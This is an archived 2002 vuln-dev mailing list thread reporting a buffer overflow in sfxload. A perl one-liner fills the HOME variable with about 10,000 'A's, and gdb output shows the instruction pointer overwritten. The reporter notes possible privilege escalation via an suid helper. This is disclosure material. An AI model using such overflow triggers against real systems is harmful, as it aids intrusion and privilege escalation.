Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: sfxload issues.

From: "Gabriel A. Maggiotti" <gmaggiot () ciudad com ar>
Date: Thu, 3 Jan 2002 17:53:30 -0300
I successfully reproduced it in my box

<qoute>
[root@tribilin /root]# cat /etc/issue

Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22 on an i586

[root@tribilin /root]# export HOME=`perl -e 'print "A" x 10235'`
[root@tribilin /root]# ./sfxload
Segmentation fault (core dumped)
</quote>

                                                                 Regards,
Gabriel A. Maggiotti

Email:       gmaggiot () ciudad com ar
Webpage: http://qb0x.net


----- Original Message -----
From: "l0rt" <simon () snosoft com>
To: <vuln-dev () securityfocus com>
Sent: Wednesday, January 02, 2002 5:53 PM
Subject: sfxload issues.




Vendor : http://members.tripod.de/iwai/awedrv.html
Program: sfxload
OS     : RH 7.1
Version: 0.4.3
SUID   : No
SGID   : No
Issue  : This may get called by an suid helper binary which would allow
a normal user to gain some more privs.

--------------------------------------------------------------------------

Details:
[raven] /u1/cores/testing/bin> export HOME=`perl -e 'print "A" x 10235'`

/* I just set HOME to be [10235] A's */

[raven] /u1/cores/testing/bin> sfxload
Segmentation fault (core dumped)

/* When xfsload is run it reads in the HOME var and cores!!! */

[raven] /u1/cores/testing/bin/sfxload> gdb /bin/sfxload  /* gdb */
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols
found)...
(gdb) core core
Core was generated by `AAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/i686/libm.so.6...done.
Loaded symbols for /lib/i686/libm.so.6
Reading symbols from /lib/i686/libc.so.6...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()
(gdb) bt
#0  0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb)

/* EIP gets killed */




--
Regards,
l0rt

------------------------------------------------------------
"The only way to get rid of temptation is to give in to it."
Previous By Date Next
Previous By Thread Next

Current thread: